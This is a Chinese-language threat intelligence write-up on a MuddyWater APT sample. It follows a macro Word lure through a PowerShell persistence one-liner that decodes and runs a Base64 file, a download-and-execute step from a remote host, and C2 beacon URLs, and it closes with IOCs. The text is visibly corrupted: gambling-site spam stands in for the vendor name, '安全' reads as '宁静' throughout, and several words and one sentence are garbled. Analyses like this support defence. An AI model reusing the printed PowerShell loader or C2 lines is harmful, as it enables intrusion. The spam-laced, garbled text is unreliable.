MuddyWater（污水）最新攻击样天职析

宣布时间 2019-05-10

MuddyWater是一个来自于伊朗的主要针对中东地域进行攻击的APT组织，其攻击目标主要集中于政府、电信及能源等领域。

近日，抖圈为赌而生金睛宁静研究团队通过VenusEye威胁情报中心狩猎系统捕捉到一个可疑文档，经过分析确认其为MuddyWater最新攻击样本。

载荷分析

攻击样本为一个Word文档，打开后会显示如下图片，诱使受害者启用宏。

宏代码执行后，会释放c:\programdata\SysTextEnc.ini文件。该文件内容为一串Base64编码数据。

然后向启动项写入如下命令行：
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc
c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))"

用于开机解密并执行c:\programdata\SysTextEnc.ini文件。解密之后为一段powershell代码，该代码用于请求hxxp://38.132.99.167/crf.txt链接的数据并执行，该链接返回的数据仍然是一段Powershell代码。

尊龙抖圈 - 为du而生

木马分析

上述过程中下载的Powershell代码即MuddyWater组织惯用的powershell木马。

解混淆后，其主函数如下所示：

依次执行wlChecul，pmrHlsl，GECOANOO，gfxEcmdascrsltp这四个函数。其中wlChecul只是为了确认服务器准备状态。结构如下URL并以POST方式发送请求：
http://82.102.8.101/bcerrxy.php?rCecms=BlackWater

如果返回值不为空且不为%COPYTHAT%才会执行后续函数。之后执行pmrHlsl函数，该函数会调用WMI获取多种计算机信息。

将获得的信息使用“*”进行拼接。计算拼接后字符串的MD5，再和“*1997* EP1”进行拼接，最后进行base64编码。

之后将结构出来的Base64编码数据拼接成如下URL并以POST方式发送出去：
http://82.102.8.101/bcerrxy.php?riHl=[EncryptedData]

如果返回结果不为空而且不为%BYE%则继续后续函数的执行。接下来要执行的函数为GECOANOO。

GeCOANOO函数结构如下数据，并以POST方式将其发送出去：
http://82.102.8.101/bcerrxy.php?cienentit=[EncryptedData]

其中的EncryptedData即上一次发送数据中进行Base64编码的MD5部门。如果返回结果不为空且返回值经过base64解码后不为"SHH"，则将解码后的返回值赋值给一个全局变量gecdrEu，然后执行下一个函数，可以判断赋值给gecdrEu的数据为一段powershell代码。

最后通过gfxEcmdascrsltp函数执行全局变量中的gecdrEu中的powershell代码。

并将返回值进行base64编码，拼凑成如下的URL格式进行上传。
http://82.102.8.101/bcerrxy.php?zCre=[Base64Str]

溯源分析

通过VenusEye威胁情报中心关联系统，我们发现了另一个早期的样本。

该样本所使用的技术都与本次我们发现的样本如出一辙。

通过溯源分析，我们发现这两个样本都与友商4月10日在社交媒体上披露的MuddyWater攻击土耳其的样底细似。下面是两者的宏代码对比。

尊龙抖圈 - 为du而生

通过对比可以发现，二者都使用相同的方式获取计算机信息，然后使用相同的计算方式计算受害者主机的唯一标识。

尊龙抖圈 - 为du而生

相比之下，早期发现的样本将上线请求、获取powershell代码、上传命令行执行结果拆分成差异PHP进行交互。而现在的版本则使用同一个PHP文件进行交互。而且早期版本如果在执行过程中遇到错误，则会将错误信息记录日志，但是最新版本则直接结束当前法式。

对于执行流程来说，最新版底细对于早期版本也有较大差异，二者的执行流程如下：

相比之下，最新的攻击活动增加了其基础设施，而且将主体代码放置到远程服务器中而不是直接通过钓鱼文档释放到当地�？梢钥闯龈米橹诓煌５母缕涔セ鞣绞胶头兰觳夥绞�。

总结

MuddyWater组织自披露之月朔直活跃至今，该组织非常青睐使用Powershell脚原来编写其攻击工具，并衍生出了该组织的专有木马POWERSTATS。虽然该组织的Powershell木马更新换代很快，但是我们仍能从其powershell代码中看到些许POWERSTATS的影子。

威胁指标（IOC）

97bf0d6e11ee4118993ad9c4b959c916
b0de46b50e209b185987010238fc65f0
0cd84d601971a91cc023e16d94cc7e6c
82.102.8.101
38.132.99.167
http://38.132.99.167/crf.txt

解决方案

1、抖圈为赌而生VenusEye威胁情报中心已经支持对本次攻击活动相关情报的查询。

2、已部署抖圈为赌而生IDS、IPS产物的客户请升级事件库到最新版本，即可有效检测或阻断攻击。

3、已部署抖圈为赌而生APT检测产物的客户无需升级，即可有效检测此次攻击。

尊龙抖圈 - 为du而生

7*24小时服务热线

400-624-3900

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

抖圈为赌而生

网络宁静防护

网络宁静检测

应用宁静

数据宁静

宁静管理

云宁静

工控宁静

移动及终端宁静

密码应用宁静

专业宁静服务

宁静运营中心

知白学院

威胁情报中心

宁静通报

研究陈诉

宁静团队

渠道体系

售后服务

升级通告

软件升级

公司概况

新闻动态

技术专题

人才招聘

投资者关系

资源中心

联系抖圈为赌而生

关于抖圈为赌而生

MuddyWater（污水）最新攻击样天职析

关于抖圈为赌而生

解决方案

宁静研究

联系抖圈为赌而生

7*24小时服务热线